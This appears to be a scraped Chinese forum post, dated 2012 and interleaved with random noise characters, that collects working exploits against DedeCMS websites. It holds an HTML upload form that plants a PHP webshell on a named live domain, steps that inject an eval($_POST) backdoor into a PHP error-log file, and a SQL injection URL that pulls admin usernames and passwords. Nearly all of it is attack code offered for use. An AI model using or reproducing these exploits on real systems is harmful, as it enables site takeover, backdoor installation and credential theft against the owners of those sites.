1 {- ~9 w* W* D+ J6 F<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>. n2 o: [# i. o/ c
</head>
% Q1 ?1 N! y$ ~5 M' [<body style="FONT-SIZE: 9pt">1 v9 u4 x: C, E5 t( k
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />: X7 S: |7 q" i4 ? z) y: l
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
; L5 z3 m3 X' U/ ~6 {. A<input type='hidden' name='activepath' value='/data/cache/' />
0 N8 F3 X. Q8 G2 V$ @6 u W<input type='hidden' name='cfg_basedir' value='../../' />
{0 Y; E0 T' W<input type='hidden' name='cfg_imgtype' value='php' />' ?5 k7 S5 W. x& a6 L, t) a
<input type='hidden' name='cfg_not_allowall' value='txt' />' j% D9 ^# n( b4 l/ Y
<input type='hidden' name='cfg_softtype' value='php' />+ F" ?1 ]* U5 i# q* k7 Q( e2 s0 |- g
<input type='hidden' name='cfg_mediatype' value='php' /> q( T& q+ `! `, W
<input type='hidden' name='f' value='form1.enclosure' />
1 _( Z! ~- M- Q& f9 N<input type='hidden' name='job' value='upload' />8 I9 a' C5 U+ ?8 }1 g
<input type='hidden' name='newname' value='fly.php' />
: v* Z$ C, i) I3 l( k- jSelect U Shell <input type='file' name='uploadfile' size='25' />
' |. g c3 f, I# @1 G( y<input type='submit' name='sb1' value='确定' />
- Y4 ]) _0 r5 X+ b</form>" Y5 @% i( r$ Z. n
<br />It's just a exp for the bug of Dedecms V55...<br />
( F, e! V- |9 V# N! Q' D* e9 d6 U( X; ONeed register_globals = on...<br />
4 C( F& d; _8 t! Q6 U2 |/ dFun the game,get a webshell at /data/cache/fly.php...<br /> I; M6 Z, k% j+ Y* _4 J
</body>2 c' y7 F6 Y- a+ A% _8 m
</html>
! c9 h$ U9 o$ }+ w$ O0 v: v6 k' B+ ~. z4 F6 I; O9 V' Y
: _ N% p: P( F
! r+ u f4 }" \
) H9 S3 K- ~4 u3 [& k" C$ w. t- Q6 v1 D, S. I( ? h" b
N2 d7 ]1 V4 r: H) v x9 V/ K3 @6 [/ N6 J) \
; T( m# Y- t9 @ n3 W8 G
4 h' ^5 r( |' o7 C8 Q( g
9 V0 ` t: U! u$ \' {织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞; M1 S& x" a/ E; M! t
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。* ~; w; ^" b( W/ x
1. 访问网址:
+ L5 y4 k2 K+ y3 A4 S8 a5 }http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>" |9 O' {+ S5 x
可看见错误信息
& [; Y6 b6 K+ Q3 @% X# f, L2 x2 L8 L6 ^1 c7 G) Y6 h
" v9 T$ h& ]6 B! t5 z
2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。* n9 f# W6 j5 z- d/ P7 V( e8 u" O
int(3) Error: Illegal double '1024e1024' value found during parsing& l1 U. U% w9 Q+ Z4 u$ a8 q
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
$ f3 d! `" G% d8 ?* p) }6 {- e5 H) t' ~8 m8 P( }% `* p5 K! q
+ l, N% x/ a) ?8 E, i3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是
" }2 \& v0 j3 V- K3 B T7 [9 @+ |: D/ f; O2 ?2 Q
1 f5 w+ y' ~ j4 K8 B! C+ R! H<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
. W7 p, M% \+ v+ z6 F1 \3 [6 W. @! w& f+ X( k$ y+ J# Y
% q6 j- w# }$ M4 B6 q
按确定后的看到第2步骤的信息表示文件木马上传成功.
, p( B2 [+ p$ |' u2 ^ F3 Q. \" Q) O3 w4 h
1 J9 m0 ^" z$ }
; f" Y" ]! t5 ~8 ~9 n8 l+ M- Y9 k: I9 Z1 Z- g
+ ]0 I1 t) \& E+ e* P6 R/ g
8 N- o) ^! s# n. x# r5 U
9 k; @' V# {% H7 T
& ]: s0 e! t/ n, ?5 s8 C; s9 B4 g! k; f. ]& v
/ M) j, k# W) P0 D8 W n
/ }3 a& q) G8 K" L+ W6 d
+ c9 \+ U! j2 }/ S3 D织梦(DedeCms)plus/infosearch.php 文件注入漏洞4 q+ B% W# [, e
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对